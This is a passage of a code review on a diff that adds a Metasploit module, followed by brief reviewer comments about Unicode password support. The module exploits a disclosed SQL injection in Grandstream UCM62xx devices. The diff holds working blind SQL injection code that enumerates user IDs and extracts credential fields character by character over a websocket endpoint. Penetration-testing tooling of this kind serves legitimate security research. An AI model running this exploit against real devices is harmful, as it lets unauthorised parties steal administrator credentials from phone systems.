modules/auxiliary/scanner/http/grandstream_ucm62xx_sql_account_guess.rb

```diff
@@ -0,0 +1,219 @@
+          [ 'URL', 'https://raw.githubusercontent.com/tenable/poc/master/grandstream/ucm62xx/dump_http_user_creds.py']
+        ],
+        'DisclosureDate' => '2020-03-30',
+        'DefaultOptions' => {
+          'RPORT' => 8089,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptInt.new('ID_SCAN', [true, 'The number of initial user ids to scan', 30])
+    ])
+  end
+
+  # Craft the SQL injection into the challenge request
+  def create_injection_request(payload)
+    id = Rex::Text.rand_text_alphanumeric(12)
+    req = "{\"type\":\"request\",\"message\":{\"transactionid\":\"#{id}\",\"version\":\"1.0\",\"action\":\"challenge\",\"username\":\""
+    req.concat(payload)
+    req.concat('"}}')
+    req
+  end
+
+  # Retrieve the server's response and pull out the status response. The return value is
+  # the server's response value (or 1 on failure).
+  def recv_wsframe(wsock)
+    res = wsock.get_wsframe
+    return 1 unless res
+
+    begin
+      res_json = JSON.parse(res.payload_data)
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'Failed to parse the returned JSON response. ')
+    end
+
+    status = res_json.dig('message', 'status')
+    return 1 if status.nil?
+
+    status
+  end
+
+  # Guess valid user ids in the database. These are sequential (0, 1, 2, etc) with the default
+  # admin user starting at 0. Return an array of valid ids.
+  def guess_user_ids
+    return_array = Array.new
+
+    datastore['ID_SCAN'].times do |n|
+      wsock = connect_ws(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/websockify')
+      )
+
+      wsock.put_wstext(create_injection_request("' OR user_id=#{n}--"))
+      next unless recv_wsframe(wsock) == 0
+
+      return_array << n
+    end
+
+    return_array
+  end
+
+  # A generic injection to guess a fields length. This assumes the field won't be longer
+  # than 64 characters. Which is probably a safe bet.
+  def guess_field_length(id, field)
+    64.times do |n|
+      wsock = connect_ws(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/websockify')
+      )
+
+      wsock.put_wstext(create_injection_request("\' OR user_id=#{id} AND LENGTH(#{field})=#{n}--"))
+      next unless recv_wsframe(wsock) == 0
+
+      return n
+    end
+
+    return 0
+  end
+
+  # A generic injection to guess a string field. This implementation guesses all printable
+  # characters (which is inline with allowed password values). It excludes \ since, while
+  # the user can technically use it in a password, you can't actually log in if the character
+  # is present. Returns the guessed value
+  def guess_string(id, field, length)
+    string = ''
+    length.times do |n|
+      for printable in 0x20...0x7e
```

Comment:
What about users with Unicode usernames or passwords such as Chinese or Japanese usernames or passwords? Or does the system not accept these?

Reply:
That's super interesting! I hadn't considered that. I'll report back later!

Reply:
Only ascii is supported so this should be fine. 

![Screenshot from 2022-01-30 02-47-15](https://user-images.githubusercontent.com/91965877/151696550-de46020e-c4ef-4abd-a81f-4767b9e4bf45.png)

![Screenshot from 2022-01-30 02-45-31](https://user-images.githubusercontent.com/91965877/151696551-6d250b9f-8e28-40ea-9e0b-ca4e336468a9.png)

Reply:
:lobster: :lobster: :lobster: